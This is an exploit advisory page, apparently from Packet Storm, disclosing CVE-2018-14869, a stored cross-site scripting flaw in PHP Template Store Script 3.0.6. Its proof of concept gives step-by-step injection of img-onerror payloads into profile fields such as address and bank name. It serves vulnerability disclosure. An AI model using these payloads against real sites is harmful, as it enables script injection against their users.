Twenty Year Anniversary

PHP Template Store Script 3.0.6 Cross Site Scripting

PHP Template Store Script 3.0.6 Cross Site Scripting
Posted Aug 3, 2018
Authored by Sarafraz Khan

PHP Template Store Script version 3.0.6 suffers from persistent cross site scripting vulnerabilities.

tags | exploit, php, vulnerability, xss
advisories | CVE-2018-14869
MD5 | 955dd57ab80d69477021cb73445e4ecf

PHP Template Store Script 3.0.6 Cross Site Scripting

Change Mirror Download
*******************************************************************************************
# Exploit Title: PHP Template Store Script- 3.0.6 - Stored XSS via Addres ,Bank Name,and A/c Holder Name
# Date: 02.08.2018
# Site Titel : Exclusive Scripts
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: http://www.exclusivescript.com/
# Category: Web Application
# Version: 3.0.6
# Exploit Author: Sarafraz Khan
# Contact: https://www.facebook.com/sarfraj.khan.79
# Web: https://goglequeens.com
# Tested on: Windows 10 -Firefox
# CVE-2018-14869
*****************************************************************************************

Proof of Concept:-
--------------------------
1. Go to the site ( http://www.server.com/ ) .
2- Click on => Login => Register => and then fill the Form and click on Register Now
3-Goto your mail and Verify it.
4-Now come back to site and Sign in using your Verified mail and Password.
5-Goto Setting => Personal information and paste these code in
Address line 1 => "><img src=x onerror=prompt(/SARAFRAZ/)>
Address Line 2 => "><img src=x onerror=prompt(/KHAN/)>
Bank name => "><img src=x onerror=prompt(/KING/)>
A/C Holder name => "><img src=x onerror=prompt(/GOOGLEQUEENS/)>

and then click on Update Profile.

6-Now You will having popup of /SARAFRAZ/ , /KHAN/ , / KING/ and /GOOGLEQUEENS/ in you account..

***************************************************************************************


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    19 Files
  • 18
    Oct 18th
    21 Files
  • 19
    Oct 19th
    16 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close